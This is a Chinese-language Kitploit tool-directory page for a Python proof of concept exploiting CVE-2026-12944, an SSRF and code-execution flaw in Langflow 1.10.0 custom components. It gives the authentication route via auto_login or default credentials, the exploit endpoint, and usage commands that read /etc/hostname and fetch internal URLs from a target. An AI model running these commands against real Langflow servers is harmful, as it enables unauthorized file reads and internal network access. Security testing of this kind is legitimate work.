Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-12944 — Python PoC,利用 CVE-2026-12944,这是 Langflow 1.10.0 中通过自定义组件里的 urllib 实现的 SSRF,具备经过身份验证的读取和获取能力。 | Kitploit
工具/GitHubGitHub/shadowforge-cyber/cve-2026-12944
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试API 安全
GitHubshadowforge-cyber/cve-2026-12944

CVE-2026-12944

Python PoC,利用 CVE-2026-12944,这是 Langflow 1.10.0 中通过自定义组件里的 urllib 实现的 SSRF,具备经过身份验证的读取和获取能力。

查看仓库
19小时28分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-12944: Langflow 1.10.0 — urllib SSRF

Langflow OSS (≤ 1.10.0) — 该漏洞允许通过自定义组件中的 urllib.request / socket 执行任意代码。
组件扫描器的拒绝列表遗漏了这些标准库模块。已在 1.10.1 中修复(IBM)。

严重性:PR:L(可公开复现 / 低严重性)

利用端点:POST /api/v1/custom_component
需要会话 cookie 或 bearer token。

如何获取已认证访问权限(3 种简单途径)

  1. --test — 无需认证。仅执行公开的 GET /api/v1/version。
  2. --read / --fetch — 首先进行认证:
    • 已启用自动登录(原版 Langflow 默认开启):
      GET /api/v1/auto_login。如果 JSON 响应包含 access_token,则发送 Authorization: Bearer …(无需用户名/密码)。
    • 已禁用自动登录:
      使用 --uname / --password 以 application/x-www-form-urlencoded 格式执行 POST /api/v1/login。
  3. 登录后,将 payload 发送至 POST /api/v1/custom_component。

--uname / --password 仅在自动登录被禁用时使用。在默认原版安装中,它们会被忽略。

仅限授权测试。 请勿对您不拥有或未获得明确测试许可的系统使用此工具。

要求:Python 3(仅标准库)。

使用示例

root@kitploit:~
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname

致谢

报告与 PoC:ShadowForge Cyber

下载工具